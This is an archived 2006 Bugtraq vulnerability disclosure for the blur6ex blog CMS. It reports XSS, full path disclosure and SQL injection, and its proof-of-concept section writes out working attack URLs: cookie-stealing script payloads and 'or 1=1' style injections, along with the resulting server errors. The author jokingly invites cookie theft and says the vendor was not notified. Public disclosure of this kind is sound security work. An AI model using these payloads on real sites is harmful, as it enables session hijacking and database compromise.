lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 11 Apr 2006 14:56:31 +0700
From: crasher@...oak.or.id
To: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in Blur6ex



 k  k         kkkk  k   kkkk  k  k  kkkkkk kkkkkk    kkkk   k    k   k   k  k
 k k         k   k  k  k   k  k k     kk   k     k  k    k  kk   k   k   k k
 kk   <><>   kkkkk  k  kkkkk  kk      kk   kkkkkk   k    k  k k  k   k   kk
 k k         k      k  k      k k     kk   k   k    k    k  k  k k   k   k k
 k  k         kkkk  k   kkkk  k  k    kk   k    k    kkkk   k   kk   k   k  k

-+| Multiple Vulnerabilities in blur6ex

Author : Rusydi Hasan M
a.k.a  : cR45H3R
Date   : April,10th 2006
Place  : Indonesia, Cilacap

-+| Software description

blur6ex is a content management system for manage a blog.
Version : 0.3.462

-+| the bugs

1. I got XSS and full path disclosures in one step.
2. SQL injection

-+| Proof of Concept [PoC]

[0] XSS + Full path disclosures

http://[victim]/[blur6ex_dir]/index.php?shard=[XSS_here]
http://[victim]/[blur6ex_dir]/index.php?shard=login&action=g_error&errormsg=[XSS_here]

after you put XSS on the URL, the XSS will work and you also get the root
directory from the error message.

E[x]ample :

http://127.0.0.1/blur/index.php?shard=%3Ch1%3Ejust%20test%20your%20web%3C/h1%3E

Warning: main(): Failed opening 'engine/shards/<h1>just test your web</h1>.php'
for inclusion
 (include_path='.:/usr/lib/php/:/usr/share/pear/') in
/var/www/html/blur/index.php on line 108

"just test your web" will show as <h1>

http://127.0.0.1/blur/index.php?shard=login&action=g_error&errormsg=%3Cscript%3Ealert(document.
cookie)%3C/script%3E
http://127.0.0.1/blur/index.php?shard=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://127.0.0.1/blur/index.php?shard=%3Cmarquee%3E --> seems good.try it :)

Now, go and steal the cookie but don't eat it :P.

[1] SQL injection

http://[victim]/[blur6ex_dir]/index.php?shard=blog&action=g_reply&ID=[SQL_here]
http://[victim]/[blur6ex_dir]/index.php?shard=blog&action=g_permaPost&ID=[SQL_here]
http://[victim]/[blur6ex_dir]/index.php?shard=content&action=g_viewContent&ID=[SQL_here]

You can see the database structure in
http://[victim]/[blur6ex_dir]/install/blur6ex_tables.sql
*if you were lucky :)*

E[x]ample :

http://127.0.0.1/blur/index.php?shard=blog&action=g_reply&ID='or%201=1/*

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server
 version for the right syntax to use near '\'or 1=1/*' at line 1

http://127.0.0.1/blur/index.php?shard=blog&action=g_reply&ID=1%20and%201=0
http://127.0.0.1/blur/index.php?shard=blog&action=g_reply&ID=1%20and%201=1

-+| Vendor

I'm Still lazy [LOLZ]

-+| Shoutz

% fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,degleng,etc
% y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous, the
day
% ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,sakitjiwa,m_beben

-+| Contact

crasher@...oak.or.id || http://kecoak.or.id





Powered by blists - more mailing lists